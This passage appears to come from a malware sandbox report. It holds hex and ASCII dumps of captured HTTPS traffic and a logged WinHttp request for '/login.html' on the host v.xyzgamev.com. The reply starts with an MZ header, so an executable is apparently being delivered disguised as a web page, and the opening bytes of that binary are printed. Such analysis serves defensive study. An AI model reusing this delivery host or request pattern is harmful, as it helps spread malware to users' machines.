                                                                                                                          2022-05-21 07:30:56 UTC436INData Raw: 1c 17 5b 97 ae c7 84 ea e7 2d a7 6a 48 05 90 ab 57 63 e7 aa 1f a9 bc f3 46 3a f0 b5 a2 3c 12 9c b2 51 b4 47 c8 a4 6a 16 db e1 5a 41 a6 22 a7 2d ed 7d db ac cd 68 bf 19 9a ab 70 ab 26 eb 14 51 2f 66 0a b5 59 8e bc 2c 0f a5 78 db c4 31 7c 88 25 85 4b be da 73 e7 17 cb 72 64 e4 14 ba c3 78 b7 22 dc 9d 51 17 68 93 8a 3f 46 be 4a c7 bd 8f 6d 7b 72 ef 67 d4 be 45 64 90 9e 11 be bf b8 b2 e1 24 ad 5e c8 7a e2 dd 34 1e e7 7e 97 bb 39 15 d6 93 9e 99 b1 83 5c 1e 4d 68 7a 8f 6c f3 16 1f 68 a5 c7 7e d2 df 55 d2 3a ed 40 3d 96 3c 24 e8 00 be 82 b8 56 6d 4b d0 15 90 42 52 5b 2a 8c 9a 72 b4 e7 a6 03 48 bd f0 45 ab 27 a1 1e e3 9d 79 bf a3 e7 78 c7 bd 90 71 ad 2b 4c a0 75 98 84 47 e7 26 83 0e af 11 58 4e b0 28 14 9a 39 71 cd 32 fe 11 bc 52 6c 2d 32 59 8c ef 23 a9 3c 76 f3
                                                                                                                          Data Ascii: [-jHWcF:<QGjZA"-}hp&Q/fY,x1|%Ksrdx"Qh?FJm{rgEd$^z4~9\Mhzlh~U:@=<$VmKBR[*rHE'yxq+LuG&XN(9q2Rl-2Y#<v
                                                                                                                          2022-05-21 07:30:56 UTC441INData Raw: 3f a8 e3 4d e5 9e fa 68 c1 6f b1 69 9a ad 3e 86 13 26 2c 1f 11 ab 7b e7 37 a9 66 e2 05 0a ff c2 52 1b 85 8c 6d 58 ed 43 dc bf 6f f7 3a ac 2b 20 ea e1 c2 cd 11 50 21 11 a3 16 cf 37 25 d5 c4 91 c7 da ef 62 e4 3c a2 77 61 2c eb db f6 c2 9d dc 67 6a 50 14 ee 77 3f b0 9d 6f 82 3f 2a f8 64 e7 9a 1a ed 79 72 e6 6d 2e 80 18 70 77 b2 b7 0c ad 2e ab 43 1b ce 66 d3 7c 81 e3 36 41 5d 4b f7 34 be 05 c8 dc 65 3d ba ac 8b 9f 09 0b b3 af 6a 8c 88 a3 75 fd 6a 34 08 5e f3 37 65 ee 40 11 74 28 ed 22 58 52 2d aa 55 1d e7 19 d8 d5 29 6f f2 81 81 fd e8 5b e7 32 ae 75 23 7d 49 8b e4 80 fd 4b b9 35 e6 75 b8 76 bb 77 a4 6b 59 97 39 ec d1 90 3f 0a b6 d8 2d 53 f6 1c 05 f2 64 6a 78 cc ed ee a4 40 d3 c3 80 a5 01 b8 04 05 db 4b de bb 7e a2 5e d3 3f ac d1 ae 88 03 09 27 36 59 fb 52 e0
                                                                                                                          Data Ascii: ?Mhoi>&,{7fRmXCo:+ P!7%b<wa,gjPw?o?*dyrm.pw.Cf|6A]K4e=juj4^7e@t("XR-U)o[2u#}IK5uvwkY9?-Sdjx@K~^?'6YR
                                                                                                                          2022-05-21 07:30:56 UTC447INData Raw: 0c 40 d2 66 fa 41 1f 1e ed 5a e1 b5 8d 06 fa 51 66 dd 9b 68 6a 19 25 0c 94 ca 0b 4a e6 ad eb 2c 68 ea 81 82 77 ad 4f 6a b0 6d 07 da 5c 91 e3 30 5f fa 36 f2 5b 32 97 26 ff 49 9e 30 c1 56 f1 ab 76 34 81 ce 31 27 ec 33 65 92 f4 ea 4e a8 cf d6 3b 88 8f 68 8c 43 e6 2d 2c 67 ae e1 24 e4 c1 6b b2 16 fa f8 63 e8 11 b6 01 a4 40 46 cb 36 df ab 74 00 97 62 f9 4c 8b 32 66 04 54 32 0f 88 95 5a e6 4d 78 52 22 0e ed 73 46 98 b3 9e 53 2a 5e 26 52 d7 0e 14 39 91 85 f0 58 56 e0 65 a0 e0 48 01 f2 bb f9 c5 d1 28 6e e0 97 82 95 eb 6f cb 59 91 b6 99 01 2e 20 11 25 1f 2d b9 bc a5 26 47 90 75 80 52 9b 6e 9f 51 86 29 f5 b8 43 a3 6b b4 a7 7c 62 57 37 ee 21 05 73 d3 29 45 87 82 cd 85 8b 19 16 2d 5b 91 2c c6 31 c8 62 97 bd d6 0f fe 6e f1 81 ac 15 b8 ec 82 2f a0 fe d2 51 14 8f 12 fe
                                                                                                                          Data Ascii: @fAZQfhj%J,hwOjm\0_6[2&I0Vv41'3eN;hC-,g$kc@F6tbL2fT2ZMxR"sFS*^&R9XVeH(noY. %-&GuRnQ)Ck|bW7!s)E-[,1bn/Q
                                                                                                                          2022-05-21 07:30:56 UTC452INData Raw: c1 ff 58 6b 14 84 ba 62 64 94 9a 6a ef e1 51 47 bf af 4f 1f f6 2b f8 74 b8 75 bb 76 ba 6b fa a9 ed a7 c7 66 c7 a9 69 6b 8b 4a ef 6e 83 a1 d8 76 00 e2 44 c6 78 dd 04 a2 ec 06 ea b2 f6 62 ef ab 5a 3a 93 2d b8 a1 24 86 3b 52 64 13 1c a8 f5 b3 ef a9 fd fa 6d 19 17 af 2a 26 cf 1e 1f 75 56 93 a7 25 9c 65 07 8e 67 f3 3f 63 f7 32 82 1f b7 66 60 2a 6c 63 16 d2 ae 27 67 65 eb ad af 5a d7 a9 fa bc af c4 b1 da af e2 21 5c df a2 22 c7 8f ef b7 7e 9d 79 0f ef 02 49 2f 41 6f b1 94 96 a4 6a d8 96 ff 26 cf 7a c3 12 e3 a9 2c 44 0a 48 ae e2 84 69 a7 97 16 26 6b d6 9e 23 2c ba ec 33 65 92 cc 3b ce c1 cf d6 3b 65 6d 6c ef 19 8c ab 79 e3 e3 aa 83 20 ef 6e d7 6d b1 7d b0 aa 75 19 86 30 bc 22 e2 ac dd 1a 7a 7e a6 a8 c4 8a e3 af 4a 8e ca 0c d6 de 64 e7 83 4f ea ad d5 f5 a7 03 ac
                                                                                                                          Data Ascii: XkbdjQGO+tuvkfikJnvDxbZ:-$;Rdm*&uV%eg?c2f`*lc'geZ!\"~yI/Aoj&z,DHi&k#,3e;;emly nm}u0"z~JdO
                                                                                                                          2022-05-21 07:30:56 UTC468INData Raw: eb 24 26 59 77 83 a5 c4 82 bd df 7e 9a 66 13 80 f8 2e 65 49 72 0a ff ab ae 92 ff 06 62 a3 ff 27 f2 c3 0c 3d f0 c2 80 8f 0e e3 6e 07 4a e8 b2 a1 9d 41 60 0b 05 a9 3c 83 1b 1c 70 8e 35 bc 6b 87 d2 bd 29 a8 fd bb a4 a1 22 ac ac 13 13 ac dc 72 44 9c da 47 0a e7 67 c8 04 ad ef e0 65 71 e0 f4 65 2c ea e3 b1 83 d1 e3 bf fe 25 85 3a e3 1e 2c 9f a1 29 34 98 31 68 2f 21 a2 2c 89 c4 c6 c0 2f 62 a8 23 e1 42 04 21 6e 48 8b a4 63 b7 92 0b 6e e5 e3 dc 19 da 94 58 9a 24 fb be 6e a7 51 bc 39 d0 61 25 f3 b3 68 24 d4 99 aa 2f 2c 2d 8c c7 69 a7 e9 64 55 c0 76 ac e0 3a 32 ad ab 34 35 c0 67 0b a1 ad 62 e0 e2 27 6c a6 6e ef 1f f9 3d 98 e0 df 96 66 fa 1f f0 79 38 a6 d9 d2 73 e7 2a 88 e1 48 c1 6b 8e 2c 88 a6 e9 ec a9 54 32 6f d8 ff 6a a5 25 d0 94 24 e8 61 27 60 e1 d7 32 c3 af 5b
                                                                                                                          Data Ascii: $&Yw~f.eIrb'=nJA`<p5k)"rDGgeqe,%:,)41h/!,/b#B!nHcnX$nQ9a%h$/,-idUv:245gb'ln=fy8s*Hk,T2oj%$a'`2[
                                                                                                                          2022-05-21 07:30:56 UTC481INData Raw: f4 1c 4b fb c9 1e 90 ff 9f 5f 8a 58 e8 5d 51 5c e9 dc be 16 11 de 65 12 47 9f 7f b5 30 9d a4 b1 79 6a a7 6a d0 1a 90 cc df 8a c8 27 12 fa ff 81 1a 00 0e b7 ce 70 39 11 c1 e0 61 fa 0c 90 56 5c 0a bf f4 d0 ec cf c3 76 e3 5f 9b 9d 2e 2f ac 3b 26 d5 5d 0d f2 a5 6a ab fd 35 32 40 30 45 05 e6 2b c0 00 1e a9 b0 37 b8 a6 20 6f 53 6b 50 58 f5 63 aa a9 c3 b7 da 9e 65 b8 4a c6 8e 75 3a f1 28 73 15 53 a4 95 65 64 02 9a f5 3c e9 57 85 0b 4f 5f 7f fa 79 8b 0f cd df 84 9f 95 34 49 ef a2 92 69 3f e9 82 23 4f de 24 2c df 86 cf e1 af b1 69 e9 55 40 5f 3d 25 77 f9 32 b5 2f 12 ff c5 18 b4 f9 ea ba 38 1f 9a 8d 9e 10 0a d5 75 dd 7a e2 d3 d5 80 13 e5 01 f0 24 43 0e 60 7c a8 c3 10 4b 0e d8 95 4e f6 5a e5 79 50 55 75 21 bb 98 05 16 1d 90 ff e7 2b 44 8f d0 8d 4b 1f 88 66 86 6f bf
                                                                                                                          Data Ascii: K_X]Q\eG0yjj'p9aV\v_./;&]j52@0E+7 oSkPXceJu:(sSed<WO_y4Ii?#O$,iU@_=%w2/8uz$C`|KNZyPUu!+DKfo
                                                                                                                          2022-05-21 07:30:56 UTC492INData Raw: df 16 a3 50 9d 62 c9 0c cb 06 c8 01 a3 0b c6 3e 9a 03 c9 04 c0 50 fa ee 53 1a 9b 57 8a 47 12 a8 d1 0e af 16 b7 1f d2 0f c0 3e 90 0b d4 b2 0c 54 9e 0f c5 6e a3 4b 86 40 e4 01 93 fe 61 0e d1 69 d2 08 c5 cc 64 0a 9a 93 66 64 a8 6b a6 6a a7 69 a2 6d af 5d 91 68 ac 7c b0 69 a1 7b b0 65 8c 47 ac 6a 58 94 f4 3a a1 6e af 60 ae 60 c4 0a e1 2e a3 6f e1 4d 8e 23 e9 24 e1 2c b3 7f 6b c1 42 69 24 e8 21 24 ee 3e f3 33 7e ef 89 40 a7 ea 2d 08 4e 96 a2 13 a1 22 e9 00 8c ab 31 7c 27 6b 47 8b 26 ea 28 64 cb 06 f4 b9 2f e3 2c 49 8d 6e 20 9a b9 dd fe 6d 4e 04 22 e8 21 cc c4 ae 21 ed 05 2b a1 88 2b 60 a7 6c a0 6a 26 a2 ff 7a a7 69 a2 6c a1 6e b5 7e b3 3f a7 6a e7 6e a6 5f a2 5a a5 38 76 ce aa 62 bf 02 af 35 a0 62 af 5d a0 6a c0 6d f0 4d 87 6a 87 6a 8f e2 25 68 af 6a cf 62 af
                                                                                                                          Data Ascii: Pb>PSWG>TnK@aidfdkjim]h|i{eGjX:n``.oM#$,kBi$!$>3~@-N"1|'kG&(d/,In mN"!!++`lj&ziln~?jn_Z8vb5b]jmMjj%hjb
                                                                                                                          2022-05-21 07:30:56 UTC498INData Raw: 83 00 8c ee 40 eb d7 65 05 ff 5b de 1b b0 40 84 49 60 cd 01 a8 63 6a 8e 80 e8 26 a7 2b eb 65 79 27 64 84 8c 1d 8d d1 ce dc 87 8e e0 46 0a 52 46 6a ff 46 ca 8f 94 45 85 3e 88 ea 13 12 0a 46 7a e7 32 34 75 c2 8b 67 db 28 d6 62 0c 46 ea b7 a4 72 00 46 9a 5f 08 76 5f c8 8b 07 49 2e f1 17 aa 46 8a f2 6a 80 19 46 3a b8 a1 7c a1 d2 8b a7 39 f3 fb d0 8b b7 aa b4 04 9d 1c 46 9a f3 9c b7 b1 df 8b 87 b3 ab 05 dc 8b d7 12 6c 3e ac 17 46 ca 01 54 01 d5 67 8b 17 1f b4 23 da 89 a7 d1 5f 88 e6 8b 87 ab c1 4c e7 8b 67 22 2d 3d 50 2a 45 0d e1 e8 e5 8b af f2 26 96 a8 88 27 eb 1e 76 22 aa 47 8b 7f d0 80 2e 46 7a 0e 57 68 87 e0 8b e7 a9 30 d9 e1 8b af a2 ff 2e 99 88 77 40 fe 61 1e 99 44 c1 67 a9 ef 8b 77 13 3e 54 03 21 46 8a 57 98 45 6a 3d 4a b6 e0 67 8a 36 77 54 b8 ea 8b b7
                                                                                                                          Data Ascii: @e[@I`cj&+ey'dFRFjFE>Fz24ug(bFrF_v_I.FjF:|9Fl>FTg#_Lg"-=P*E&'v"G.FzWh0.w@aDgw>T!FWEj=Jg6wT
                                                                                                                          2022-05-21 07:30:56 UTC504INData Raw: 83 4e a7 6a 3f 5a 0a ef 26 6b a7 6a d7 09 b4 ea 26 6b a7 6a a7 6a a7 6a c6 0b d5 18 a7 6a a7 6a c5 08 c0 0d a7 6a a7 6a c4 09 c6 0b a7 6a a7 6a a7 6a a7 6a dd 10 cf 02 8a 47 e4 29 ef 22 f4 39 a7 6a a7 6a c4 09 d4 19 a7 6a a7 6a c3 0e c6 0b a7 6a a7 6a c3 0e c2 0f a7 6a a7 6a c2 0f cb 06 a7 6a a7 6a c2 0f c9 04 a7 6a a7 6a c2 0f d4 19 a7 6a a7 6a c1 0c ce 03 a7 6a a7 6a c1 0c d5 18 a7 6a a7 6a cf 02 c2 0f a7 6a a7 6a cf 02 d2 1f a7 6a a7 6a ce 03 d4 19 a7 6a a7 6a ce 03 d3 1e a7 6a a7 6a cd 00 c6 0b a7 6a a7 6a cc 01 c8 05 a7 6a a7 6a c9 04 cb 06 a7 6a a7 6a c9 04 c8 05 a7 6a a7 6a d7 1a cb 06 a7 6a a7 6a d7 1a d3 1e a7 6a a7 6a d5 18 c8 05 a7 6a a7 6a d5 18 d2 1f a7 6a a7 6a cf 02 d5 18 a7 6a a7 6a d4 19 cc 01 a7 6a a7 6a d4 19 d6 1b a7 6a a7 6a d4 19 d1
                                                                                                                          Data Ascii: Nj?Z&kj&kjjjjjjjjjjjG)"9jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj
                                                                                                                          2022-05-21 07:30:56 UTC520INData Raw: 23 81 c7 2f 68 82 a7 62 aa 6e ae 31 35 af 42 89 d4 18 c5 68 c3 8c 42 6f a2 5b 98 61 97 17 eb 6b fd 6d 9a 0a 03 aa c5 85 4f 6a c7 5f a1 3b c0 34 ff 50 f5 60 a7 24 e8 6b 3d cb fc 0a 7f 53 43 0e c4 8c 48 83 44 11 8d 5a c5 8c 27 06 4e 88 4d 82 cf 05 b8 73 8e 4a ae 7d d4 3b 92 7d b4 3a c7 be 1e 00 94 7d b1 5b ff 02 b7 0a b4 16 c8 9a 5f 71 78 dc ed 2a 97 0b f7 6b c4 69 c7 86 e5 01 01 10 57 82 c5 01 98 3d cf 54 f1 02 46 e3 ce 62 94 3e c9 e2 47 02 4d af 60 fc 9f 2e 4d ad 62 81 ce 50 1d df 92 9f 64 4c d6 6b 37 13 ae 83 cf 2a e6 ce 63 6d 4d 85 c5 25 61 87 a2 77 b7 66 bb 37 86 ec 5d 22 fc 65 bb 16 47 f6 b9 1a b7 60 1f a8 75 ba c7 1b a6 78 bd 62 b5 2c e3 7a b5 58 b3 51 a8 78 27 e8 e8 45 dc 71 d7 0b be 78 9d 47 aa 7a bf 77 52 98 bd 82 55 70 2d ec 43 88 3d 02 57 0a 26
                                                                                                                          Data Ascii: #/hbn15BhBo[akmOj_;4P`$k=SCHDZ'NMsJ};}:}[_qx*kiW=TFb>GM`.MbPdLk7*cmM%awf7]"eG`uxb,zXQx'EqxGzwRUp-C=W&
                                                                                                                          2022-05-21 07:30:56 UTC520INData Raw: 94 6c bd 6e 56 0f a0 f8 aa 66 28 e4 a1 6f 90 66 6e 9e bb 6e be 6e ac 60 76 f7 ea 6e 43 b9 9d 23 d7 11 5e be c1 ae 28 21 af 36 a1 38 07 ca dd 11 a6 72 c4 10 a6 ba 75 84 7b 41 99 49 a1 4f e6 5d f4 6a b2 8b 19 20 af 16 9f d3 20 19 2c 50 16 8f f2 da 16 d6 da 19 5c 93 26 52 1d 70 a6 70 a5 63 5c ab 92 6e dd a2 15 69 bf 79 ad 73 8a 5e aa 67 be 41 80 8f 44 99 47 7b 66 b5 68 a7 da 16 cb 0a ac 31 ee 4b 92 67 80 39 d3 c0 0c 4c e4 a7 0f 4c b4 9e cf c3 81 4c 04 c9 30 c4 eb 0a c5 1c 17 ea 24 c5 bd dd 0a 26 b9 57 f4 6a 86 de 0e 42 9f 67 d6 9d 21 6b 55 79 76 5a 2f 0f f9 ff 78 93 1f d1 d2 3c c6 9d 12 1d de 66 36 72 1f 70 04 fb be 6b 63 1f 15 1b f5 46 aa 4f 76 6f 57 30 cd 5a 7b 42 57 93 5a 50 9e d8 3a 07 d6 27 da e0 2c 6b 23 de 97 ae c4 fc 16 da 98 9c 5e 6b a2 5e dd 82 b5
                                                                                                                          Data Ascii: lnVf(ofnnn`vnC#^(!68ru{AIO]j ,P\&Rppc\niys^gADG{fh1Kg9LLL0$&WjBg!kUyvZ/x<f6rpkcFOvoW0Z{BWZP:',k#^k^
                                                                                                                          2022-05-21 07:30:56 UTC531INData Raw: 11 75 bc 77 a6 69 8a 15 be 1e 57 a2 ac 0e f1 4d b2 eb 49 14 96 47 db 2d f0 6c a4 4e a1 0b 8e 77 f8 85 11 6e 72 64 2c 30 7c 6f 1b 22 9e 07 d3 7f e2 2b c5 39 92 6a a9 a1 49 45 ab 62 a6 0c a7 1f f2 41 8e 33 ad 6d b6 62 02 98 78 8f c6 cb 3a 54 ab 6b a7 e4 3c 76 c5 cd 05 69 f5 4e b7 7d ac 57 8c 45 94 5d 86 79 b8 60 24 d8 48 d6 c2 05 f8 51 a7 69 a3 67 ae 06 d7 29 a6 0b 9a 65 b6 69 54 82 a0 71 d3 6a 3c f2 e0 35 dc 43 8a 5a 9c 56 d4 1c 51 5e 7a 46 22 31 86 15 40 5b a6 59 d9 35 9a 5c 53 55 31 3f ba 54 a2 2d f4 58 b6 c0 18 48 20 6e b9 a5 f0 37 9a 6e c2 35 ca 6b 91 6c b5 7a 6b a2 f0 1f 87 38 9c 51 f3 10 8e 49 b2 6c ad 65 a8 d9 1e 0e 9b 0e 9e 0a 62 a4 53 f2 af 42 dc 5d 28 e4 4a 2b 7f 73 df 3a 81 46 8b 85 49 70 a1 77 a4 06 bd 51 a4 27 2b e3 6c cf 62 b4 d8 1e 50 28 00
                                                                                                                          Data Ascii: uwiWMIG-lNwnrd,0|o"+9jIEbA3mbx:Tk<viN}WE]y`$HQig)eiTqj<5CZVQ^zF"1@[Y5\SU1?T-XH n7n5klzk8QIlebSB](J+s:FIpwQ'+lbP(
                                                                                                                          2022-05-21 07:30:56 UTC535INData Raw: 46 40 09 f9 d5 0b c6 05 86 a4 52 1b c2 8b 50 3c f0 82 bd 8d d0 87 ae 52 0d 69 a7 3a 3c a0 a6 5a 73 8f 6e 3e b1 e5 40 94 7f 25 cf 89 4a 86 74 89 72 8a 97 21 3b 8a 6c 46 47 83 4b de 37 c1 e1 46 47 a2 8f 8a 4e 86 95 bd 4a 39 39 4a 47 be 93 8a 4e 86 92 ba 47 ce aa 23 50 ad 97 8a 4e 86 93 bb 47 ca e7 8a f5 e4 9b 8a 4e 86 90 b8 47 c6 eb 8a 7f 1d e8 8a 4e 86 91 b9 47 c2 ef 8a 43 6e 47 bb 9f 86 9e b6 47 de f3 8a 1b 36 43 87 4b 01 f4 b7 47 da f7 8d 40 6a 4a 8e 4b 2a 53 3b 47 86 ab 8d 48 6a 4b 8f 40 2a 01 8a d1 e8 b3 8d 8c 35 33 bb 70 8f 42 8d e6 9c f6 8a 57 7a 47 96 b3 86 42 8d e1 ca 47 d4 e1 72 40 4d 67 87 4b 8f 42 8d e0 cb 47 da 13 e6 c8 84 ae 82 4b 8f 40 2e 05 8a f9 38 4b 8d a8 8a 4b 8f 40 2f 04 8a b3 d7 ee 8d b0 92 4b 8f 40 20 0b 8a bb 96 40 3f ed 9a 4b 8f 40
                                                                                                                          Data Ascii: F@RP<Ri:<Zsn>@%Jtr!;lFGK7FGNJ99JGNG#PNGNGNGCnGG6CKG@jJK*S;GHjK@*53pBWzGBGr@MgKBGK@.8KK@/K@ @?K@
                                                                                                                          2022-05-21 07:30:56 UTC544INData Raw: 17 da 67 1a e6 28 a5 d9 86 a9 42 af d7 fa 07 5a e3 5e d6 1a d6 9b e6 da a1 38 43 da d6 1b a4 6d a2 6b cf b7 a2 da b7 0a d7 81 7c 5a 16 4d c1 ea d7 be 6f 70 12 da 84 3a d7 c0 3d 5a d6 02 dc b8 67 1a b0 7a a1 18 74 ba d7 09 90 36 ae 99 f2 bd a7 1a 10 ed 97 7e bb ac 6c 6f d6 1b 8b 4f af 6b 71 c4 ef 5f d3 1b 9f e2 17 e6 9b da d6 1b fd 7a 5d da 07 7a 17 1b d6 1c 61 da 13 b5 7c da d6 1b 34 49 17 a2 df da d6 1b 0f 6f ba da 7f 02 17 1b d6 91 ec da 4f 32 17 2b 97 1b af 68 ac 6b 5f 22 17 7a 1a b7 d7 fc 01 5a 56 93 4f fa d7 9f 62 5a b7 4e 58 a4 a2 1b d6 02 c4 60 06 ca 97 85 7d 6f d6 1b c9 b4 17 80 05 92 17 1a a7 1a 22 df 97 5b d1 5c d6 70 41 26 17 32 8f 1b d7 1b a5 64 aa 3f f3 1a 67 da b7 0a d7 41 bc 5a 3f f7 52 3e 33 2a d7 96 56 66 a6 ea 66 5b d6 6b a9 65 a6 ae 53
                                                                                                                          Data Ascii: g(BZ^8Cmk|ZMop:=Zgzt6~loOkq_z]za|4IoO2+hk_"zZVObZNX`}o"[\pA&2d?gAZ?R>3*Vff[keS
                                                                                                                          2022-05-21 07:30:56 UTC549INData Raw: 0b 11 a5 5e 58 a4 06 ce 47 6a 47 15 a3 f2 39 97 c7 8a fb 71 9c f6 11 5c c3 8f 46 11 bc 0b 02 65 6c 0b 47 8b 2c 81 c6 d3 7f 0b 36 1a 47 70 04 b3 c7 a2 0f 0b 47 8b 34 84 d8 c4 0b b2 1f 0b 47 8b 56 fb c6 87 2b 0b 06 ca d9 16 a5 16 bb 0a 5b f6 c6 ee c3 8b 66 cb c6 63 a9 6a a1 8b 46 60 56 f1 c6 77 db 0b a6 15 da 68 07 ed 00 e8 a5 46 eb 0b 96 ba 47 70 06 b1 c7 22 8f 0b 47 8b b7 fb 24 c4 0b 32 9f 0b 47 8b 8b 26 c6 1b b7 0b 0b 26 46 3e 97 0f 47 8b cc 61 c6 ef c3 88 27 98 37 8a 30 7f 27 68 33 9e c6 d9 b5 2a 47 ae e7 8e 42 8f c6 bb 97 8a 8b ee 8a 0f 1e 53 c6 db f7 8a 34 71 87 c0 a5 8e 23 0b 06 ba d7 86 7b 5a 02 7e 68 e4 27 1a df 9b dd bf 01 9a d7 64 63 90 97 5b d1 5c d6 61 26 e2 a5 3a f3 69 a6 6c d6 1b f1 8c 17 72 8a ef 17 0a b7 1a 50 ad 97 9b 64 58 2c 49 0d 68 63
                                                                                                                          Data Ascii: ^XGjG9q\FelG,6GpG4GV+[fcjF`VwhFGp"G$2G&&F>Ga'70'h3*GBS4q#{Z~h'dc[\a&:ilrPdX,Ihc
                                                                                                                          2022-05-21 07:30:56 UTC555INData Raw: 46 e3 4a 0f 47 8b 11 7a 65 0f 47 8b 67 ce c2 8a 46 b3 1a 0f 6b 46 46 98 31 0f 47 8b b1 da 61 07 4a 81 c1 e6 46 45 ec 0f 47 8b ee 47 c2 8a 46 08 1e d5 c2 8a 46 11 b8 0f 47 8b 32 9b c2 8a 46 dc bd a2 c2 8a 46 ae 07 0f 47 8b 57 fe c2 d2 ff 8b b7 dd 63 04 48 88 c7 0b 5a f6 aa bd 41 d6 47 eb 46 0a 46 ab 66 8b 5e f3 c6 0d 41 0a 0d c1 46 7b 1e 21 41 8e 46 4d 2b a5 c2 8a 46 20 89 0f f6 da 47 15 b8 0a fc 53 a2 ed 47 d9 70 0f 47 8b 44 e9 c6 67 03 1d 7d 6f 46 8b 5e f3 c6 4b e7 0b c6 6a 6e c7 a3 e0 4d 0a 46 8e a2 75 a7 75 98 51 9c 51 9c 51 87 4a 3b be e8 69 a7 fa 59 07 a4 1a ba 04 c8 06 33 9e c7 0b c7 6b 47 8b 47 8b 07 ec 90 9b 0a 47 c6 d7 0e 1f 41 f5 ba 66 af 92 47 12 58 06 57 69 cb 23 e2 0a 5f f2 c2 6b b4 1d 9e 25 b5 ee 27 42 76 90 a4 ae 9b 71 4c 63 44 8f a0 6e a3
                                                                                                                          Data Ascii: FJGzeGgFkFF1GaJFEGGFFG2FFGWcHZAGFFf^AF{!AFM+F GSGpGDg}oF^KjnMFuuQQQJ;iY3kGGGAfGXWi#_k%'BvqLcDn
                                                                                                                          2022-05-21 07:30:56 UTC558INData Raw: 7f ba 77 c2 57 36 f3 3e 0b c7 02 cf 0a 7a 1a df 12 e7 2a ef 22 c7 ef 8f 5a 97 52 9f 6a a7 0a ea 89 4c 81 54 99 5c 91 c4 07 64 a1 6c b9 74 b1 7c 09 aa c9 0c c1 14 d9 1c d1 c4 47 24 e1 2c f9 34 f1 3c 09 6a 08 cd 00 d5 18 dd 10 c5 87 e5 20 ed 38 f5 30 fd 08 2a 48 8d 40 95 58 9d 50 c5 c7 a5 60 ad 78 b5 70 bd 08 ea 88 4d 80 55 98 5d 90 c5 07 65 a0 6d b8 75 b0 7d 08 aa c8 0d c0 15 d8 1d d0 04 20 84 9f ff a2 6e a2 94 ff 32 ff c2 55 30 d5 1a 6f 4b ce 09 39 1a ef 22 1f 92 e7 32 ff a3 d9 70 a2 72 a4 b1 67 cf 57 97 ad 87 e8 68 f5 3c a1 40 3d ba e4 19 17 f8 6d b2 b6 e3 ff c4 b1 d2 69 27 ea a5 6a c6 c6 33 fc ca 4f fe 3b b0 e6 ba 8f 42 87 4a 0f fa 9f 5a 97 62 af 6a a7 c2 17 72 07 cb 1e d3 16 db 0e 4a 2e f3 3e fb 36 83 4e c3 ef 8b 56 9b 6e a3 66 ab 1e 0a 7e 43 8e 20 c1
                                                                                                                          Data Ascii: wW6>z*"ZRjLT\dlt|G$,4<j 80*H@XP`xpMU]emu} n2U0oK9"2prgWh<@=mi'j3O;BJZbjrJ.>6NVnf~C


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          1192.168.2.449764104.21.40.196443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:31:02 UTC558OUTGET /login.html HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                          Host: v.xyzgamev.com
                                                                                                                          2022-05-21 07:31:03 UTC559INHTTP/1.1 200 OK
                                                                                                                          Date: Sat, 21 May 2022 07:31:03 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Last-Modified: Wed, 18 May 2022 14:01:13 GMT
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gyoSUpiMXJvEmalz3Gy4OeZs0RSv%2F1JXLbH046g8nsyy9BC74r%2Fio67mbxQZJRNF6YOMC8Yi6gDnTTZsC2wOwHWaalcPijJZcaB5bnMg1hblekdbySeHXQRKkxKjoDa6ZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 70eb9c34e84d8ffa-FRA
                                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                          2022-05-21 07:31:03 UTC559INData Raw: 31 63 35 39 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e8 29 61 ba ac 48 0f e9 ac 48 0f e9 ac 48 0f e9 8b 8e 72 e9 bc 48 0f e9 8b 8e 61 e9 b5 48 0f e9 8b 8e 62 e9 eb 48 0f e9 6f 47 52 e9 af 48 0f e9 ac 48 0e e9 e0 48 0f e9 8b 8e 7d e9 ad 48 0f e9 8b 8e 75 e9 ad 48 0f e9 8b 8e 77 e9 ad 48 0f e9 52 69 63 68 ac 48 0f e9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 32 df 84 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b
                                                                                                                          Data Ascii: 1c59MZ@!L!This program cannot be run in DOS mode.$)aHHHrHaHbHoGRHHH}HuHwHRichHPEL2b!
